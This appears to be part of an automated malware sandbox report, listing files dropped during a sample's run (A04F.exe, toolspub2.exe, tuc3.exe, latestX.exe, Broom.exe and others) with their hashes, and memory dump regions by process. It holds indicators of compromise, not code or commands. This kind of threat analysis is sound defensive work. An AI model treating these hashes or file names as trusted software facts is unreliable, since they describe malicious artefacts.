SHA512 d954cd9752d04a8d182377505e5c9a9f942425daf99301e3a136d1dca7565d8b181485d08852194c1b9152752b75824ce55c052d3697bf0c54e48dfb56332f28

memory/4540-16-0x0000000074460000-0x0000000074C10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A04F.exe

MD5 91d23595c11c7ee4424b6267aabf3600
SHA1 ef161bb8e90cebdf81f4e53dfccb50c1f90a9a02
SHA256 d58937d468f6ca92b12ee903a16a4908de340f64f894cf7f1c594cd15c0c7e47
SHA512 cb9ed75c14e7b093cabab66c22d412371c639ace31fbe976c71ffec6007bf85b3d7d3e591fe5612e2a035298398d32e1aa7dc0d753f93328ebc2ce8e44fb8d2b

memory/844-21-0x0000000074460000-0x0000000074C10000-memory.dmp

memory/844-22-0x0000000000BE0000-0x0000000000C1C000-memory.dmp

memory/4540-23-0x0000000000370000-0x0000000001826000-memory.dmp

memory/844-24-0x0000000007F40000-0x00000000084E4000-memory.dmp

memory/844-25-0x0000000007A30000-0x0000000007AC2000-memory.dmp

memory/844-27-0x0000000007B70000-0x0000000007B80000-memory.dmp

memory/844-28-0x00000000079C0000-0x00000000079CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 77471d919a5e2151fb49f37c315af514
SHA1 0687047ed80aa348bdc1657731f21181995b654c
SHA256 52666594a3e8bd7ac277411e215e1f65a7771f7c1d5b00a9e6ec95fade64f1f1
SHA512 6ffb45e79b03bac2820c98503793cd11c13803f49522eea9334c4c6cd05384dda3a60b0a8a8f363abc439ad444f1a8da290f0350fa69b75b6c3c9701177f8844

memory/844-41-0x0000000008B10000-0x0000000009128000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 cde750f39f58f1ec80ef41ce2f4f1db9
SHA1 942ea40349b0e5af7583fd34f4d913398a9c3b96
SHA256 0a434be25f55f27ce0adbdfb08efeac1da01125b3e9194a94669bc7e9c6fe094
SHA512 c181faacbef70f8a91606943470af50cfd443958c48601051371ff5d9bf66bb9ec794571b05a347a7f5776f06484dc007f535591d2f5e1c57e3c0ee04f3e9580

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 f81be07058935d224ab3843bff94fec0
SHA1 1a7360901f8cb5017f7a41ca1a6984227b712b16
SHA256 8d4df79cf6bf1cb8285b7358a7c6d92c7f665065999934b24c1175311d99fb6c
SHA512 342b2c767af972819c57091e9d9d65578522fa48549b6c40aad6791b0c65e186b377e3f095458e8b5d873ffdadd73897252a13bead652bd74a09540d2c27c96e

memory/844-55-0x0000000007D80000-0x0000000007E8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 1f40433778e799319ae0ece36d28f00f
SHA1 4ce947e15182e61e379fbfbf52b6625cb0528c69
SHA256 1d360b097bfd95b5e6312350928af25631973ff1ddfce7835ac5c8b239b9e58c
SHA512 30e0d4d61dd4535f7e09a0e0d49691dbb9f99ed54f01b4b898eb786b466cdba34e170677887831daa5e6f98bf2f0d8ca7729a2bf7949ee0ac043a617b419030f

memory/844-66-0x0000000007B30000-0x0000000007B42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 00e93456aa5bcf9f60f84b0c0760a212
SHA1 6096890893116e75bd46fea0b8c3921ceb33f57d
SHA256 ff3025f9cf19323c5972d14f00f01296d6d7a71547eca7e4016bfd0e1f27b504
SHA512 abd2be819c7d93bd6097155cf84eaf803e3133a7e0ca71f9d9cbc3c65e4e4a26415d2523a36adafdd19b0751e25ea1a99b8d060cad61cdfd1f79adf9cd4b4eca

memory/844-79-0x0000000007CB0000-0x0000000007CEC000-memory.dmp

memory/4700-81-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4540-84-0x0000000074460000-0x0000000074C10000-memory.dmp

memory/1344-85-0x0000000000B50000-0x0000000000B51000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp

MD5 5525670a9e72d77b368a9aa4b8c814c1
SHA1 3fdad952ea00175f3a6e549b5dca4f568e394612
SHA256 1180706added2a7899f08f25a9f88ecff5d003ba8964f918d00779565e4a6978
SHA512 757249f7e67f82522a8e3079a22c5cf92111626446a32ad3ef876f23885f62d1bb5bf3238d564e23531d062fe18742568dfc00e33b049bb8eef05eb953ef981a

memory/844-89-0x0000000007CF0000-0x0000000007D3C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GMI39.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/4880-104-0x0000000002100000-0x0000000002101000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GMI39.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

memory/4840-109-0x0000000002A70000-0x0000000002E6A000-memory.dmp

memory/4700-110-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4840-214-0x0000000002E70000-0x000000000375B000-memory.dmp

memory/1344-233-0x0000000000400000-0x0000000000965000-memory.dmp

C:\Program Files (x86)\xrecode3\xrecode3.exe

MD5 aa9f5a4dbd05ae5fbefe5cea48f2f355
SHA1 ea851b9f6521875a8a550d9c788bd11750ae6151
SHA256 0f01b2ad6d8723a6d2195080d2fba1eb2e853510828e27c47299efa34956ef02
SHA512 dfb39816d508dba9a3ac74d6c27829e8415c39482f6de21171767f3f1fcddc0cf443608b1ca0e4c45ce0241c7ebffa4c324701d73e207917181671ae6f6ff521

memory/3332-239-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp

memory/4840-241-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2132-243-0x0000000000400000-0x0000000000785000-memory.dmp

memory/2132-242-0x0000000000400000-0x0000000000785000-memory.dmp

memory/2132-246-0x0000000000400000-0x0000000000785000-memory.dmp

memory/2132-247-0x0000000000400000-0x0000000000785000-memory.dmp

memory/844-248-0x0000000074460000-0x0000000074C10000-memory.dmp

memory/4632-249-0x00000000009D0000-0x0000000000AD0000-memory.dmp

memory/4632-250-0x00000000023E0000-0x00000000023E9000-memory.dmp

memory/3356-251-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4880-254-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/844-255-0x0000000007B70000-0x0000000007B80000-memory.dmp

memory/3356-257-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4028-258-0x0000000000400000-0x0000000000785000-memory.dmp

memory/4840-259-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/3384-261-0x00000000020E0000-0x00000000020F6000-memory.dmp

memory/3356-262-0x0000000000400000-0x0000000000409000-memory.dmp

memory/844-266-0x0000000007ED0000-0x0000000007F36000-memory.dmp

memory/1344-267-0x0000000000400000-0x0000000000965000-memory.dmp

memory/1344-269-0x0000000000B50000-0x0000000000B51000-memory.dmp

memory/3664-270-0x0000000003230000-0x0000000003266000-memory.dmp

memory/3664-271-0x0000000074460000-0x0000000074C10000-memory.dmp

memory/3664-272-0x0000000005420000-0x0000000005430000-memory.dmp

memory/4880-273-0x0000000002100000-0x0000000002101000-memory.dmp

memory/844-274-0x0000000009400000-0x00000000095C2000-memory.dmp

memory/4840-275-0x0000000002A70000-0x0000000002E6A000-memory.dmp

memory/3664-278-0x0000000005A60000-0x0000000006088000-memory.dmp

memory/844-277-0x0000000009B00000-0x000000000A02C000-memory.dmp

memory/3664-276-0x0000000005420000-0x0000000005430000-memory.dmp

memory/3664-279-0x0000000006090000-0x00000000060B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hda52irk.xjc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3664-285-0x0000000006130000-0x0000000006196000-memory.dmp

memory/3664-290-0x0000000006380000-0x00000000066D4000-memory.dmp

memory/3664-291-0x00000000067C0000-0x00000000067DE000-memory.dmp

memory/4028-293-0x0000000000400000-0x0000000000785000-memory.dmp

memory/4840-294-0x0000000002E70000-0x000000000375B000-memory.dmp

memory/3664-295-0x0000000006D80000-0x0000000006DC4000-memory.dmp

memory/4840-296-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/3664-299-0x0000000005420000-0x0000000005430000-memory.dmp

memory/3664-300-0x0000000007B70000-0x0000000007BE6000-memory.dmp

memory/3664-301-0x0000000008270000-0x00000000088EA000-memory.dmp

memory/3664-302-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

memory/3332-303-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp

memory/4840-304-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2724-305-0x000001A87B790000-0x000001A87B7B2000-memory.dmp

memory/2724-306-0x00007FFAFD8F0000-0x00007FFAFE3B1000-memory.dmp

memory/4028-307-0x0000000000400000-0x0000000000785000-memory.dmp

memory/2724-317-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp

memory/2724-318-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp

memory/3664-320-0x0000000007DB0000-0x0000000007DE2000-memory.dmp

memory/3664-321-0x0000000070AD0000-0x0000000070B1C000-memory.dmp

memory/3664-322-0x000000006C1C0000-0x000000006C514000-memory.dmp

memory/3664-332-0x0000000007D90000-0x0000000007DAE000-memory.dmp

memory/3664-333-0x0000000007DF0000-0x0000000007E93000-memory.dmp

memory/2724-334-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp

memory/3664-335-0x0000000007EE0000-0x0000000007EEA000-memory.dmp

memory/844-336-0x0000000009820000-0x0000000009870000-memory.dmp

memory/2724-337-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e243a38635ff9a06c87c2a61a2200656
SHA1 ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256 af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

memory/4840-367-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/3332-370-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp

memory/3332-377-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp

memory/4028-379-0x0000000000400000-0x0000000000785000-memory.dmp